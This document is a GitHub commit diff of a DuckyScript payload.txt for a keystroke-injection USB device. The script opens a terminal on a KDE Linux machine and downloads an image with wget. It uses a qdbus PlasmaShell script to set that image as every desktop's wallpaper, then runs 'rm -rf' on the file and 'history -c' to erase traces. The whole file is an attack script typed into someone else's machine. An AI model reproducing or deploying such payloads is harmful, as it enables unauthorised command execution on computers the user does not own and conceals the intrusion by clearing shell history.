Update payload.txt

pull/140/head
Kalani Helekunihi 2023-06-12 15:29:06 -04:00 committed by GitHub
parent 8f7eedafb5
commit 8dec741f1a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 15 deletions

View File

@ -11,29 +11,22 @@ REM ###########################################
REM Requirements: REM Requirements:
REM - Internet Connection REM - Internet Connection
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Replace 'example.com/IMAGE_NAME' with your image link REM Replace 'example.com/IMAGE_NAME' with your image link
DEFINE IMAGE_LINK example.com/IMAGE_NAME DEFINE IMAGE_LINK example.com/IMAGE_NAME
STRING wget
STRING IMAGE_LINK
ENTER
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
DEFINE IMAGE_PATH="file://example.jpg" DEFINE IMAGE_PATH="file://example.jpg"
DELAY 1000
CTRL ALT t
DELAY 2000
STRINGLN wget IMAGE_LINK
REM It depends by the Internet Connection REM It depends by the Internet Connection
DELAY 2000 DELAY 2000
STRING qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i<allDesktops.length;i++) {d = allDesktops[i]; d.wallpaperPlugin = "org.kde.image";d.currentConfigGroup = Array("Wallpaper", "org.kde.image", "General");d.writeConfig("Image", " STRINGLN qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i<allDesktops.length;i++) {d = allDesktops[i]; d.wallpaperPlugin = "org.kde.image";d.currentConfigGroup = Array("Wallpaper", "org.kde.image", "General");d.writeConfig("Image", "IMAGE_PATH")}'
STRING IMAGE_PATH
STRING ")}'
ENTER
DELAY 1000 DELAY 1000
STRING rm -rf STRINGLN rm -rf IMAGE_PATH;history -c; exit;
STRING IMAGE_PATH
STRING ;history -c; exit;
ENTER